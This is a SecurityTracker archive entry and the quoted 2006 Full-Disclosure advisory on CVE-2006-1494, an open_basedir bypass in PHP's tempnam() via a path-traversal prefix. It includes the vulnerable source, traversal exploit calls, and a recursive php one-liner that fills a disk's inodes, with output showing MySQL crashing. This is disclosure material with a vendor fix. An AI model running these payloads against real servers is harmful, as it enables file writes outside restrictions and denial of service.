Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
PHP tempname() Argument Error Lets Users Bypass open_basedir Restrictions
|
|
SecurityTracker Alert ID: 1015881 |
|
SecurityTracker URL: http://securitytracker.com/id/1015881
|
|
CVE Reference:
CVE-2006-1494
(Links to External Site)
|
Date: Apr 9 2006
|
Impact:
Denial of service via local system, Modification of system information, Modification of user information
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 4.4.2, 5.1.2
|
Description:
A vulnerability was reported in PHP in the tempname() function. A user can bypass open_basedir restrictions.
A user with the privileges to load arbitrary PHP code can create PHP code with a tempname() function that uses a specially crafted value for the second argument. When the function is executed, the system will create a temporary file in an arbitrary directory (outside of the basedir specification, but still subject to file system permissions).
This can be exploited to create numerous files on the target system and potentially deny service on the target system.
A demonstration exploit function is provided:
tempnam("/home", "../../../../../../tmp/cx");
Maksymilian Arciemowicz (cXIb8O3) of SecurityReason.com reported this vulnerability.
The original advisory is available at:
http://securityreason.com/achievement_securityalert/36
|
Impact:
A user with the ability to load arbitrary PHP code can bypass open_basedir restrictions and create files on the target system.
|
Solution:
The vendor has issued a fixed version (5.1.3RC3), available at:
http://www.php.net/downloads.php
|
Vendor URL: www.php.net/ (Links to External Site)
|
Cause:
Access control error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Sat, 8 Apr 2006 21:41:54 +0200
Subject: [Full-disclosure] tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2
|
Source: http://securityreason.com/achievement_securityalert/36
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write dynamically
generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
tempnam -- Create file with unique file name
- --- 1. tempnam() open_basedir bypass ---
In function tempname() are required 2 arg`s.
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
So, if we have open_basedir set to /home, we can't create file over /home
directory.
In ext/standard/file.c (PHP 4.4.2)
- -550-578---
PHP_FUNCTION(tempnam)
{
pval **arg1, **arg2;
char *d;
char *opened_path;
char p[64];
FILE *fp;
if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) ==
FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(arg1);
convert_to_string_ex(arg2);
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));
if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
fclose(fp);
RETVAL_STRING(opened_path, 0);
} else {
RETVAL_FALSE;
}
efree(d);
}
- -550-578---
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
Where is arg2?
So we can write exploit like:
tempnam("path_from_open_basedir",
"../../../../../../../../Open_basedir_bypasswd");
tempnam("/home", "../../../../../../tmp/cx");
etc.
It is low issue but you can try create a lot of files and overload inodes from
HD.I have one particion.
/var /dev/ad0s1e 1.0G 97M 858M 10% /var <- Space (B)
/dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var <-
INODES
where mysql and apache try create some file. WWhen we overload free inodes,
system have big problem with apache, mysql.
Example:
cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx");
cx(); } cx();'
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
... etc
/usr/local/libexec/mysqld: Can't create/write to file
'/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!
- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
- --- 3. Greets ---
For: sp3x
and
p_e_a, pi3, eax, Infospec ;]
- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L
kBEMIExP2TZ0+NP7l5uk9TE=
=f3i4
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
Go to the Top of This SecurityTracker Archive Page
|
